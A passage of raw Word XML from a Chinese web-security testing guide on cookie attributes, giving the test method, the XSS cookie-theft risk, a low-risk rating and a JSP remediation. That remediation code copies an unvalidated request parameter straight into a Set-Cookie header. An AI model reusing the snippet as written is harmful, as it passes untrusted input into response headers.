          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性、</w:t>
      </w:r>
      <w:r w:rsidR="00290E79" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Expires</w:t>
      </w:r>
      <w:r w:rsidR="00290E79" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544DF4A7" w14:textId="77777777" w:rsidR="008415F9" w:rsidRPr="00267BE4" w:rsidRDefault="00B648AD" w:rsidP="00267BE4">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8F10BB" w14:textId="1555E837" w:rsidR="00B648AD" w:rsidRPr="00267BE4" w:rsidRDefault="008415F9" w:rsidP="00267BE4">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过用</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描工具进行对网站的扫描，如果存在相关</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookies</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的安全性问题，则一般工具都会检测出来，误报率小。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7478BE" w14:textId="273BFFA1" w:rsidR="008415F9" w:rsidRPr="00267BE4" w:rsidRDefault="008415F9" w:rsidP="00267BE4">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或在浏览器调试窗口的网络请求处查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP Header</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，判断是否设置</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性</w:t>
      </w:r>
      <w:r w:rsidR="00CA5DD9" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EEBDB4" w14:textId="77777777" w:rsidR="00424BA7" w:rsidRPr="00267BE4" w:rsidRDefault="00C24790" w:rsidP="00267BE4">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00B648AD" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00424BA7" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidR="00424BA7" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的属性设置不当可能会造成系统用户安全隐患，</w:t>
      </w:r>
      <w:r w:rsidR="00424BA7" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidR="00424BA7" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息泄露是</w:t>
      </w:r>
      <w:r w:rsidR="00424BA7" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cookie http only</w:t>
      </w:r>
      <w:r w:rsidR="00424BA7" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置缺陷引起的，在设置</w:t>
      </w:r>
      <w:r w:rsidR="00424BA7" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidR="00424BA7" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，可以设置的一个属性，如果</w:t>
      </w:r>
      <w:r w:rsidR="00424BA7" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidR="00424BA7" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有设置这个属性，该</w:t>
      </w:r>
      <w:r w:rsidR="00424BA7" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidR="00424BA7" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>值可以被页面脚本读取。</w:t>
      </w:r>
      <w:r w:rsidR="00424BA7" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00424BA7" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如：当攻击者发现一个</w:t>
      </w:r>
      <w:r w:rsidR="00424BA7" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidR="00424BA7" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞时，通常会写一段页面脚本，窃取用户的</w:t>
      </w:r>
      <w:r w:rsidR="00424BA7" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidR="00424BA7" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如果未设置</w:t>
      </w:r>
      <w:r w:rsidR="00424BA7" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http only</w:t>
      </w:r>
      <w:r w:rsidR="00424BA7" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性，则可能导致用户</w:t>
      </w:r>
      <w:r w:rsidR="00424BA7" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidR="00424BA7" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息泄露，攻击者能够利用该用户的身份进行系统资源访问及操作。如图是设置了</w:t>
      </w:r>
      <w:r w:rsidR="00424BA7" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookies</w:t>
      </w:r>
      <w:r w:rsidR="00424BA7" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性和没有设置属性，被</w:t>
      </w:r>
      <w:r w:rsidR="00424BA7" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidR="00424BA7" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跨站截获的</w:t>
      </w:r>
      <w:r w:rsidR="00424BA7" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookies</w:t>
      </w:r>
      <w:r w:rsidR="00424BA7" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对比：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF09AA7" w14:textId="77777777" w:rsidR="00424BA7" w:rsidRPr="00267BE4" w:rsidRDefault="00424BA7" w:rsidP="00267BE4">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>设置了</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>httponly</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5569C0AC" w14:textId="35E5C2AD" w:rsidR="00424BA7" w:rsidRPr="00267BE4" w:rsidRDefault="00424BA7" w:rsidP="000B549D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLineChars="95"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BC995B8" wp14:editId="704583FF">
            <wp:extent cx="4102100" cy="11811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0" cy="1181100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="551175AD" w14:textId="77777777" w:rsidR="00424BA7" w:rsidRPr="00267BE4" w:rsidRDefault="00424BA7" w:rsidP="00267BE4">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>未设置</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>httponly</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD40106" w14:textId="5E3D3AA2" w:rsidR="00B648AD" w:rsidRPr="00267BE4" w:rsidRDefault="00424BA7" w:rsidP="000B549D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLineChars="95"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F818C44" wp14:editId="0671922F">
            <wp:extent cx="3962400" cy="132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1320800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1238354C" w14:textId="77777777" w:rsidR="00B648AD" w:rsidRPr="00267BE4" w:rsidRDefault="00B648AD" w:rsidP="00267BE4">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11617097" w14:textId="729939B3" w:rsidR="00B648AD" w:rsidRPr="00267BE4" w:rsidRDefault="005E097D" w:rsidP="00267BE4">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>低危</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：存在未设置</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> HttpOnly </w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Secure </w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性；</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Domain </w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Path </w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置路径不合理。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618D79B6" w14:textId="1F157174" w:rsidR="006A5350" w:rsidRPr="00267BE4" w:rsidRDefault="00B648AD" w:rsidP="00267BE4">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="006A5350" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果网站基于</w:t>
      </w:r>
      <w:r w:rsidR="006A5350" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidR="006A5350" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而非服务器端的验证，</w:t>
      </w:r>
      <w:r w:rsidR="00385623" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建议设置</w:t>
      </w:r>
      <w:r w:rsidR="00650BEF" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidR="00650BEF" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的一些安全</w:t>
      </w:r>
      <w:r w:rsidR="00385623" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性</w:t>
      </w:r>
      <w:r w:rsidR="006A5350" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="004F1389" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>jsp</w:t>
      </w:r>
      <w:r w:rsidR="00385623" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
      <w:r w:rsidR="006A5350" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r w:rsidR="00385623" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下</w:t>
      </w:r>
      <w:r w:rsidR="006A5350" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="006A5350" w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8494"/>
      </w:tblGrid>
      <w:tr w:rsidR="00385623" w:rsidRPr="00267BE4" w14:paraId="34628558" w14:textId="77777777" w:rsidTr="00961B64">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672BA67" w14:textId="77777777" w:rsidR="00385623" w:rsidRPr="00267BE4" w:rsidRDefault="00385623" w:rsidP="00267BE4">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00267BE4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">response.setHeader("SET-COOKIE", </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B1BCBB4" w14:textId="2AFC0550" w:rsidR="00385623" w:rsidRPr="00267BE4" w:rsidRDefault="00385623" w:rsidP="00267BE4">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00267BE4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
              <w:t>"user=" + request.getParameter("cookie") + "; HttpOnly");</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B83BD5A" w14:textId="0425EE7D" w:rsidR="00385623" w:rsidRPr="00267BE4" w:rsidRDefault="004F1389" w:rsidP="00267BE4">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
